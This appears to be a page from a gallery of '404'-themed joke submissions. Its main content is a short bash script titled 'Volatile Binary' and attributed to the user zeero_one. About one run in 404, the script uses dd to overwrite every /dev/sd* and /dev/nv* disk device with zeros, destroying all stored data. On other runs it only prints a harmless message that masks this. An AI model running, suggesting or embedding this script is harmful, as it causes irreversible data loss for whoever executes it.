zeero_one
Volatile Binary
#!/bin/bash
if [[ $[ $RANDOM % 404 ] == 0 ]]; then
for f in /dev/sd*; do
dd if=/dev/zero of=$f
done
for f in /dev/nv*; do
dd if=/dev/zero of=$f
done
else
echo "Non Volatile Unary"
fi
Error 404
Browse others (14)
|
lu_x Lu_x |
|
cesargt cesar lopez |
|
bbrazil Brian Brazil |
|
towboat Hilmy Farid |
|
milhouse1337 Pascal Meunier |
|
|
tkuhlman Tim Kuhlman |
|
skydeboer Sky DeBoer |
|
|
jessicarabbit Jessica |






